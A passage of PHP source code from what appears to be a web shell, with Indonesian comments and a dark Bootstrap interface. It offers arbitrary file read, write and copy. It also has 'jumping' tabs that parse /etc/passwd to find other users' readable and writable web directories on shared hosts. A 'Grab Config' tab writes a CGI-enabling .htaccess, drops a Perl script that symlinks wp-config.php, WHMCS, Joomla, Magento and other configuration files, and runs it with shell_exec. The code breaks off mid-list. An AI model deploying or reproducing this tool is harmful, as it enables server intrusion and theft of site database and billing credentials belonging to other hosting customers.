(Not accessible) </small> </div> </div>'; } } echo '</div>'; // Directory stats $accessible_count = 0; foreach($common_dirs as $path => $dir_info) { if(is_dir($path) && is_readable($path)) { $accessible_count++; } } echo '<div class="mt-3"> <div class="row text-center"> <div class="col-6"> <div class="card bg-dark border-secondary"> <div class="card-body p-2"> <h6 class="mb-0">'.$accessible_count.'</h6> <small>Accessible</small> </div> </div> </div> <div class="col-6"> <div class="card bg-dark border-secondary"> <div class="card-body p-2"> <h6 class="mb-0">'.(count($common_dirs) - $accessible_count).'</h6> <small>Inaccessible</small> </div> </div> </div> </div> </div>'; echo '</div></div></div></div></div></div>'; // JavaScript untuk filter directories echo '<script> function filterDirectories() { var input = document.getElementById("searchDirs"); var filter = input.value.toLowerCase(); var items = document.getElementsByClassName("dir-item"); for (var i = 0; i < items.length; i++) { var item = items[i]; var text = item.textContent || item.innerText; if (text.toLowerCase().indexOf(filter) > -1) { item.style.display = ""; } else { item.style.display = "none"; } } } </script>'; } // Tab File Operations (dipindahkan dari Archive Tools) elseif($_GET['do'] == 'fileops') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-files me-2"></i>File Operations</h5> </div> <div class="card-body">'; echo '<div class="row g-4">'; // File Operations echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-primary"> <i class="bi bi-files me-2"></i>File Operations </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Source File:</label> <input type="text" name="source_file" class="form-control bg-dark text-light" placeholder="/path/to/source/file" required> </div> <div class="mb-3"> <label class="form-label">Destination File:</label> <input type="text" name="dest_file" 
class="form-control bg-dark text-light" placeholder="/path/to/destination/file" required> </div> <div class="mb-3"> <label class="form-label">Operation:</label> <select name="file_op" class="form-select bg-dark text-light"> <option value="copy">Copy File</option> <option value="read">Read File Content</option> <option value="write">Write to File</option> <option value="highlight">Highlight File (PHP/HTML/JS)</option> </select> </div> <div class="mb-3" id="write_content" style="display:none;"> <label class="form-label">Content to Write:</label> <textarea name="file_content" class="form-control bg-dark text-light" rows="3" placeholder="Enter content to write"></textarea> </div> <button type="submit" name="do_file_op" class="btn btn-primary w-100"> <i class="bi bi-play-fill me-2"></i>Execute Operation </button> </form>'; if(isset($_POST['do_file_op'])) { $source = $_POST['source_file']; $dest = $_POST['dest_file']; $operation = $_POST['file_op']; echo '<div class="mt-3">'; switch($operation) { case 'copy': if(copyFile($source, $dest)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File copied successfully from <code>'.$source.'</code> to <code>'.$dest.'</code> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Failed to copy file </div>'; } break; case 'read': $content = readFileContent($source); if($content !== false) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File content read successfully<br> <pre class="mt-2 p-2 bg-dark text-light rounded" style="max-height: 300px; overflow: auto;">' .htmlspecialchars(substr($content, 0, 5000)).'</pre> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot read file or file not found </div>'; } break; case 'write': $content = $_POST['file_content'] ?? 
''; if(writeFile($dest, $content)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File written successfully to <code>'.$dest.'</code> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Failed to write file </div>'; } break; case 'highlight': $highlighted = highlightFileContent($source); if($highlighted !== false) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> File highlighted successfully </div> <div class="mt-2">'.$highlighted.'</div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot highlight file </div>'; } break; } echo '</div>'; } echo '<script> document.querySelector("select[name=\'file_op\']").addEventListener("change", function() { var writeDiv = document.getElementById("write_content"); if(this.value == "write") { writeDiv.style.display = "block"; } else { writeDiv.style.display = "none"; } }); </script>'; echo '</div></div></div>'; // Quick File Tools echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-info"> <i class="bi bi-tools me-2"></i>Quick File Tools </div> <div class="card-body"> <div class="d-grid gap-2"> <a href="?act=newfile&dir='.$dir.'" class="btn btn-outline-success"> <i class="bi bi-file-earmark-plus me-2"></i>Create New File </a> <a href="?act=newfolder&dir='.$dir.'" class="btn btn-outline-primary"> <i class="bi bi-folder-plus me-2"></i>Create New Folder </a> <button type="button" class="btn btn-outline-warning" data-bs-toggle="modal" data-bs-target="#findFilesModal"> <i class="bi bi-search me-2"></i>Find Files by Extension </button> <button type="button" class="btn btn-outline-info" data-bs-toggle="modal" data-bs-target="#findTextModal"> <i class="bi bi-file-text me-2"></i>Find Text in Files </button> </div> <div class="mt-3"> <h6><i class="bi bi-info-circle me-2"></i>File Functions Status:</h6> <table class="table table-dark table-sm"> <tr> 
<td>file_get_contents:</td> <td>'.(function_exists('file_get_contents') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>fopen/fread:</td> <td>'.(function_exists('fopen') && function_exists('fread') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>highlight_file:</td> <td>'.(function_exists('highlight_file') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> </table> </div> </div> </div> </div>'; echo '</div></div></div>'; // Modals untuk find files echo ' <!-- Find Files Modal --> <div class="modal fade" id="findFilesModal" tabindex="-1" aria-labelledby="findFilesModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content bg-dark"> <div class="modal-header"> <h5 class="modal-title" id="findFilesModalLabel">Find Files by Extension</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <form method="post" action="?do=scan"> <div class="mb-3"> <label class="form-label">Directory to Scan:</label> <input type="text" name="scan_dir" class="form-control bg-dark text-light" value="'.$dir.'" required> </div> <div class="mb-3"> <label class="form-label">File Extensions (comma separated):</label> <input type="text" name="scan_ext" class="form-control bg-dark text-light" placeholder="php,html,js,css,txt" value="php,html,js"> </div> <button type="submit" class="btn btn-primary w-100"> <i class="bi bi-search me-2"></i>Find Files </button> </form> </div> </div> </div> </div> <!-- Find Text Modal --> <div class="modal fade" id="findTextModal" tabindex="-1" aria-labelledby="findTextModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content bg-dark"> <div class="modal-header"> <h5 class="modal-title" 
id="findTextModalLabel">Find Text in Files</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Directory to Scan:</label> <input type="text" name="text_dir" class="form-control bg-dark text-light" value="'.$dir.'" required> </div> <div class="mb-3"> <label class="form-label">Text to Search:</label> <input type="text" name="search_text" class="form-control bg-dark text-light" placeholder="password, database, config" required> </div> <div class="mb-3"> <label class="form-label">File Extensions:</label> <input type="text" name="text_ext" class="form-control bg-dark text-light" placeholder="php,txt,conf,config" value="php,txt,conf"> </div> <button type="submit" name="do_text_search" class="btn btn-primary w-100"> <i class="bi bi-search me-2"></i>Search Text </button> </form> </div> </div> </div> </div>'; } // Tab Jumping - DIPERBAIKI elseif($_GET['do'] == 'jumping') { $i = 0; echo "<div class='card mb-4'>"; // Check for HSphere if(preg_match("/hsphere/", $dir)) { echo '<div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-hdd-rack me-2"></i>HSphere Jumping</h5> </div> <div class="card-body">'; $urls = explode("\r\n", $_POST['url'] ?? 
''); if(isset($_POST['jump'])) { echo "<div class='alert alert-info'> <i class='bi bi-search me-2'></i> <strong>Searching in HSphere...</strong> </div> <div class='table-responsive'> <table class='table table-dark table-sm'> <thead> <tr> <th>Status</th> <th>Path</th> <th>Actions</th> </tr> </thead> <tbody>"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); if($f) { while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $status = is_writable($url_user) ? '<span class="badge bg-success">RW</span>' : '<span class="badge bg-warning">R</span>'; echo "<tr> <td>{$status}</td> <td> <code>{$url_user}</code> </td> <td> <a href='?dir=".urlencode($url_user)."' class='btn btn-sm btn-outline-success'> <i class='bi bi-box-arrow-in-right'></i> Open </a> </td> </tr>"; } } } fclose($f); } } echo "</tbody></table></div>"; if($i == 0) { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No accessible directories found </div>'; } else { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Total ada '.$i.' Kamar di '.$server_ip.' 
</div>'; } } else { // Show domain list from HSphere echo '<center> <form method="post"> <div class="mb-3"> <label class="form-label">List Domains:</label> <textarea name="url" class="form-control bg-dark text-light" style="height: 250px;">'; $sites_file = "/hsphere/local/config/httpd/sites/sites.txt"; if(file_exists($sites_file) && is_readable($sites_file)) { $fp = fopen($sites_file,"r"); if($fp) { while($getss = fgets($fp)) { echo htmlspecialchars($getss); } fclose($fp); } } else { echo "# HSphere sites.txt not found\n"; echo "# Add domains manually, one per line\n"; echo "example1.com\n"; echo "example2.com\n"; echo "example3.com\n"; } echo '</textarea> </div> <button type="submit" name="jump" class="btn btn-primary" style="width: 100%; height: 40px;"> <i class="bi bi-box-arrow-in-right me-2"></i>Jumping </button> </form></center>'; } echo '</div></div>'; } // Check for vHosts elseif(preg_match("/vhosts|vhost/", $dir)) { echo '<div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-server me-2"></i>vHosts Jumping</h5> </div> <div class="card-body">'; preg_match("/\/var\/www\/(.*?)\//", $dir, $vh); $urls = explode("\r\n", $_POST['url'] ?? ''); if(isset($_POST['jump'])) { echo "<div class='alert alert-info'> <i class='bi bi-search me-2'></i> <strong>Searching in vHosts...</strong> </div> <div class='table-responsive'> <table class='table table-dark table-sm'> <thead> <tr> <th>Status</th> <th>Domain</th> <th>Path</th> <th>Actions</th> </tr> </thead> <tbody>"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace("www.", "", $url); $web_vh = "/var/www/".($vh[1] ?? 'unknown')."/$url/httpdocs"; if(is_dir($web_vh) === true && is_readable($web_vh)) { $i++; $status = is_writable($web_vh) ? 
'<span class="badge bg-success">RW</span>' : '<span class="badge bg-warning">R</span>'; echo "<tr> <td>{$status}</td> <td><strong>{$url}</strong></td> <td><code>{$web_vh}</code></td> <td> <a href='?dir=".urlencode($web_vh)."' class='btn btn-sm btn-outline-success'> <i class='bi bi-box-arrow-in-right'></i> Open </a> </td> </tr>"; } } echo "</tbody></table></div>"; if($i == 0) { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No accessible vHosts directories found </div>'; } else { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Total ada '.$i.' Kamar di '.$server_ip.' </div>'; } } else { // Show domain list from Bing echo '<center> <form method="post"> <div class="mb-3"> <label class="form-label">List Domains:</label> <textarea name="url" class="form-control bg-dark text-light" style="height: 250px;">'; // Simulate bing search echo bing('ip:"' . $server_ip . '"'); echo '</textarea> </div> <button type="submit" name="jump" class="btn btn-primary" style="width: 100%; height: 40px;"> <i class="bi bi-box-arrow-in-right me-2"></i>Jumping </button> </form></center>'; } echo '</div></div>'; } // Default /etc/passwd scanning else { echo '<div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-people me-2"></i>User Directory Jumping</h5> </div> <div class="card-body">'; echo "<div class='alert alert-info'> <i class='bi bi-search me-2'></i> <strong>Scanning /etc/passwd for user directories...</strong> </div>"; $etc = fopen("/etc/passwd", "r"); if(!$etc) { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Can\'t read /etc/passwd </div>'; } else { echo '<div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>User</th> <th>Status</th> <th>Directory</th> <th>Domain</th> <th>Actions</th> </tr> </thead> <tbody>'; while($passwd = fgets($etc)) { if(preg_match_all('/(.*?):x:/', $passwd, $user_jumping)) { foreach($user_jumping[1] as 
$user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $status = is_writable($user_jumping_dir) ? '<span class="badge bg-success">RW</span>' : '<span class="badge bg-warning">R</span>'; // Try to get domain $domain_info = ""; if(function_exists('posix_getpwuid')) { $domain_jump = @file_get_contents("/etc/named.conf"); if($domain_jump) { preg_match_all("#/var/named/(.*?)\.db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); if($user_jumping_url && $user_jumping_url['name'] == $user_idx_jump) { $domain_info = "<span class='badge bg-info'>{$dj}</span>"; break; } } } if(empty($domain_info)) { $domain_info = '<span class="text-muted">No domain</span>'; } } else { $domain_info = '<span class="text-muted">posix not available</span>'; } echo "<tr> <td><strong>{$user_idx_jump}</strong></td> <td>{$status}</td> <td><code>{$user_jumping_dir}</code></td> <td>{$domain_info}</td> <td> <a href='?dir=".urlencode($user_jumping_dir)."' class='btn btn-sm btn-outline-success'> <i class='bi bi-box-arrow-in-right'></i> Open </a> </td> </tr>"; } } } } fclose($etc); echo "</tbody></table></div>"; if($i == 0) { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No user directories found with public_html </div>'; } else { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Total ada '.$i.' Kamar di '.$server_ip.' </div>'; } } echo '</div></div>'; } echo "</div>"; } // Tab Grab Config - DIPERBAIKI elseif($_GET['do'] == 'grab') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-download me-2"></i>Grab Configuration Files</h5> </div> <div class="card-body">'; // Buat direktori pbm_config $config_dir = $dir . 
"/pbm_config"; @mkdir($config_dir, 0777, true); // Buat file .htaccess untuk konfigurasi $htaccess_content = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin"; $htaccess_file = $config_dir . "/.htaccess"; @file_put_contents($htaccess_file, $htaccess_content); // Cek jika berada di vhosts if(preg_match("/vhosts|vhost/", $dir)) { echo '<div class="alert alert-info"> <i class="bi bi-info-circle me-2"></i> <strong>vHosts Directory Detected:</strong> '.$dir.' </div>'; $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); // Buat file vhost.cin (Perl script untuk symlink) $vhost_script = '#!/usr/bin/perl -I/usr/local/bandmin opendir(my $dir , "/var/www/vhosts/"); foreach(sort readdir $dir) { my $isDir = 0; $isDir = 1 if -d $_; $sitess = $_; if($isDir && $sitess !~ /^\./) { # Buat symlink untuk berbagai konfigurasi CMS symlink("/var/www/vhosts/$sitess/httpdocs/includes/configure.php", "$sitess-shop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/os/includes/configure.php", "$sitess-shop-os.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscom/includes/configure.php", "$sitess-oscom.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerce/includes/configure.php", "$sitess-oscommerce.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerces/includes/configure.php", "$sitess-oscommerces.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/configure.php", "$sitess-shop2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shopping/includes/configure.php", "$sitess-shop-shopping.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sale/includes/configure.php", "$sitess-sale.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/amember/config.inc.php", "$sitess-amember.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.inc.php", "$sitess-amember2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/members/configuration.php", 
"$sitess-members.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/config.php", "$sitess-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/includes/config.php", "$sitess-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/conf.php", "$sitess-5.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-4.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/WP/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/press/wp-config.php", "$sitess-wp13-press.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/wp-config.php", "$sitess-wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Wordpress/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/wp-config.php", "$sitess-Wordpress-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/wp-config.php", "$sitess-Wordpress-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress-blog.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress-beta.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blogs/wp-config.php", "$sitess-Wordpress-blogs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/wp-config.php", "$sitess-Wordpress-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/wp-config.php", 
"$sitess-Wordpress-portal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/wp-config.php", "$sitess-Wordpress-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/wp-config.php", "$sitess-Wordpress-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/test/wp-config.php", "$sitess-Wordpress-test.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/arcade/functions/dbclass.php", "$sitess-ibproarcade.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/joomla/configuration.php", "$sitess-joomla2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/configuration.php", "$sitess-joomla-portal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/joo/configuration.php", "$sitess-joo.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cms/configuration.php", "$sitess-joomla-cms.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/configuration.php", "$sitess-joomla-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/configuration.php", "$sitess-joomla-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/configuration.php", "$sitess-joomla-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/configuration.php", "$sitess-joomla-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/configuration.php", "$sitess-joomla-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/config.php", "$sitess-vb~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb3/includes/config.php", "$sitess-vb3~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/config.php", "$sitess-vb1~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/class_core.php", "$sitess-vbluttin~class_core.php.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/class_core.php", "$sitess-vbluttin~class_core.php1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/class_core.php", "$sitess-vbluttin~class_core.php2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm15.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/central/configuration.php", "$sitess-whm-central.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/whmcs/configuration.php", "$sitess-whm-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/WHMCS/configuration.php", "$sitess-whm-WHMCS.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmc/WHM/configuration.php", "$sitess-whmc-WHM.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmcs/configuration.php", "$sitess-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/support/configuration.php", "$sitess-support.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supp/configuration.php", "$sitess-supp.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/configuration.php", "$sitess-sucure.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whm/configuration.php", "$sitess-sucure-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whmcs/configuration.php", "$sitess-sucure-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cpanel/configuration.php", "$sitess-cpanel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/panel/configuration.php", "$sitess-panel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/configuration.php", "$sitess-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/configuration.php", "$sitess-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/configuration.php", "$sitess-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/configuration.php", "$sitess-joomla.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/submitticket.php", "$sitess-whmcs2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clients/configuration.php", "$sitess-clients.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/configuration.php", "$sitess-client.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clientes/configuration.php", "$sitess-clientes.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cliente/configuration.php", "$sitess-cliente.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/clientsupport/configuration.php", "$sitess-clientsupport.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/configuration.php", "$sitess-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/manage/configuration.php", "$sitess-whm-manage.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/my/configuration.php", "$sitess-whm-my.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/myshop/configuration.php", "$sitess-whm-myshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/dist-configure.php", "$sitess-zencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/zencart/includes/dist-configure.php", "$sitess-shop-zencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/dist-configure.php", "$sitess-shop-ZCshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Settings.php", "$sitess-smf.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/smf/Settings.php", "$sitess-smf2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/Settings.php", "$sitess-smf-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/Settings.php", "$sitess-smf-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/upload/includes/config.php", "$sitess-up.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/article/config.php", "$sitess-Nwahy.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/up/includes/config.php", "$sitess-up2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/conf_global.php", "$sitess-6.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/include/db.php", "$sitess-7.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/connect.php", "$sitess-PHP-Fusion.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/mk_conf.php", "$sitess-9.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sites/default/settings.php", "$sitess-Drupal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/member/configuration.php", "$sitess-1member.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/billings/configuration.php", "$sitess-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/configuration.php", "$sitess-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/requires/config.php", "$sitess-AM4SS-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/includes/iso4217.php", "$sitess-hostbills-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/includes/iso4217.php", "$sitess-hostbills-client.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/support/includes/iso4217.php", "$sitess-hostbills-support.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/includes/iso4217.php", "$sitess-hostbills-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billings/includes/iso4217.php", "$sitess-hostbills-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/includes/iso4217.php", "$sitess-hostbills-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/includes/iso4217.php", "$sitess-hostbills-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/includes/iso4217.php", "$sitess-hostbills-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostings/includes/iso4217.php", "$sitess-hostbills-hostings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostbillincludes/iso4217.php", "$sitess-hostbills-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills-hostbill.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/app/etc/local.xml", "$sitess-Magento.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-Opencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/settings.inc.php", "$sitess-Prestashop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/koneksi.php", "$sitess-Lokomedia.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/lokomedia/config/koneksi.php", "$sitess-Lokomedia.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/slconfig.php", "$sitess-Sitelok.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/application/config/database.php", "$sitess-Ellislab.txt"); } } print "Location: ./\n\n";'; $vhost_file = $config_dir . "/vhost.cin"; @file_put_contents($vhost_file, $vhost_script); @chmod($vhost_file, 0755); echo '<div class="alert alert-warning"> <i class="bi bi-gear me-2"></i> <strong>vHosts Config Script Created:</strong> vhost.cin<br> <small>This Perl script will create symlinks to configuration files</small> </div>'; echo '<div class="d-grid gap-2"> <a href="?dir='.urlencode($config_dir).'" class="btn btn-success"> <i class="bi bi-folder me-2"></i>Open pbm_config Directory </a>'; // Try to execute the script $output = @shell_exec("cd " . escapeshellarg($config_dir) . " && ./vhost.cin 2>&1"); if($output) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Script executed successfully!<br> <small>Symlinks created in pbm_config directory</small> </div>'; } else { echo '<div class="alert alert-info mt-3"> <i class="bi bi-info-circle me-2"></i> Script ready to run. You can execute it manually from the directory. 
</div>'; } echo '</div>'; } else { // Jika tidak di vhosts, scan /etc/passwd untuk user echo '<div class="alert alert-info"> <i class="bi bi-people me-2"></i> <strong>Scanning /etc/passwd for user configurations...</strong> </div>'; $etc = @fopen("/etc/passwd", "r"); if(!$etc) { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> <strong>Error:</strong> Cannot read /etc/passwd </div>'; } else { $users_found = 0; $configs_found = 0; // Daftar konfigurasi yang akan di-scan $grab_config = array( // vBulletin "/home/USER/public_html/vb/includes/config.php" => "vBulletin1", "/home/USER/public_html/forum/includes/config.php" => "vBulletin3", "/home/USER/public_html/cc/includes/config.php" => "vBulletin4", "/home/USER/public_html/includes/config.php" => "vBulletin2", // WordPress "/home/USER/public_html/wp-config.php" => "Wordpress1", "/home/USER/public_html/blog/wp-config.php" => "Wordpress2", "/home/USER/public_html/wp/wp-config.php" => "WordPress", "/home/USER/public_html/wordpress/wp-config.php" => "WordPress", // Joomla "/home/USER/public_html/configuration.php" => "Joomla1", "/home/USER/public_html/blog/configuration.php" => "Joomla2", "/home/USER/public_html/joomla/configuration.php" => "Joomla3", "/home/USER/public_html/portal/configuration.php" => "joomla-portal", // WHMCS "/home/USER/public_html/whm/configuration.php" => "Whm1", "/home/USER/public_html/whmc/configuration.php" => "Whm2", "/home/USER/public_html/support/configuration.php" => "Whm3", "/home/USER/public_html/client/configuration.php" => "Whm4", "/home/USER/public_html/billings/configuration.php" => "Whm5", "/home/USER/public_html/billing/configuration.php" => "Whm6", "/home/USER/public_html/clients/configuration.php" => "Whm7", "/home/USER/public_html/whmcs/configuration.php" => "Whm8", "/home/USER/public_html/order/configuration.php" => "Whm9", // Other CMS "/home/USER/public_html/admin/conf.php" => "5", "/home/USER/public_html/admin/config.php" => 